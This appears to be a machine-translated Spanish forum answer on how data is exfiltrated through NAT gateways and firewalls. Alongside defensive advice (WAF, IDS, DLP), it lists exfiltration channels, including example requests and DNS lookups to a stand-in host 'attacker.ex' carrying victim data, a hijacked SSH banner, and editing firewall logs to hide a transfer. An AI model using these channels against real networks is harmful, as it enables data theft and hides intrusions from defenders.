En mi opinión, cuando se trata de la extracción de datos, debería abordar la situación desde dos:
- Red pública (nuestra puerta de enlace NAT (incluido el firewall))
- Red interna (VLAN internas, la red interna)
En general, la puerta de enlace NAT (incluido el firewall) no hará nada (nada, espacio en blanco, solo IPs y puertos .. ¡hurra!) para proteger los datos en cuanto a los puertos abiertos (reenviados) con sus respectivos servicios o aplicaciones. vulnerable.
Si tiene en su red una aplicación vulnerable con la ejecución remota de código y la expone al mundo, entonces está listo. Es solo una cuestión de tiempo hasta que un atacante con conocimiento del RCE extraiga datos de ese servidor y otros activos de la red interna (pivotando a través del primer servidor web).
Más aún, una puerta de enlace NAT (que incluye un firewall) no lo protegerá de Reverse Shells u otros medios de exfiltración de datos de la red interna.
También en el caso de una aplicación web, ni siquiera desea preocuparse por los registros, ya que solo se registraría el acceso (prohibido o no). Su aplicación web se expone al mundo, gracias y sé que me veré como un usuario legítimo cuando envíe la carga útil en la medida en que no esté enviando muchas solicitudes por segundo.
En una breve respuesta, en mi opinión:
- La mejor manera de detectar un ataque en una aplicación web es usar un
WAF.
- La mejor manera de detectar un ataque en algo es usar un
IPS / IDS.
- La mejor manera de proteger la fuga de datos es tener un DLP y un IDS en
el lvl de la red con ciertos dispositivos host o en servidores.
- La mejor manera de restringir y administrar el acceso a su red es usar un firewall.
Algunas formas difíciles de extraer datos de una red interna o de servidores de aplicaciones internos:
- Sobre el puerto 0 (sí, es un puerto)
- Sobre solicitudes web (solicito attacker.ex / data? = this_is_the_victim_data)
- Sobre solicitudes de DNS (solicito this_is_the_victim_data.attacker.ex)
- A través de VPN o proxy (debería ser su última opción, ya que puede detectarse fácilmente)
- Sobre algunos servicios públicos y legítimos (aplicaciones web, ftps, ftp, etc.)
- Al reemplazar un servicio legítimo (por ejemplo, reemplazar el servicio ssh en un servidor público comprometido y extraer datos a través del banner ssh generalmente ignorado)
- El cielo es el límite aquí ...
Sí, para: "Además, como el sistema ya está pirateado, podría guardar el registro del Firewall antes de transmitir datos y restaurarlos después de que se complete la transacción del archivo de copia".
"¿Mi idea es completa, o hay una respuesta clara a esto?" Es difícil reemplazar un registro pero se hizo antes, lo he hecho antes.
No agreguemos todas las formas en que un firewall no puede ser registrado o bloqueado y mantenerlo para un día mejor.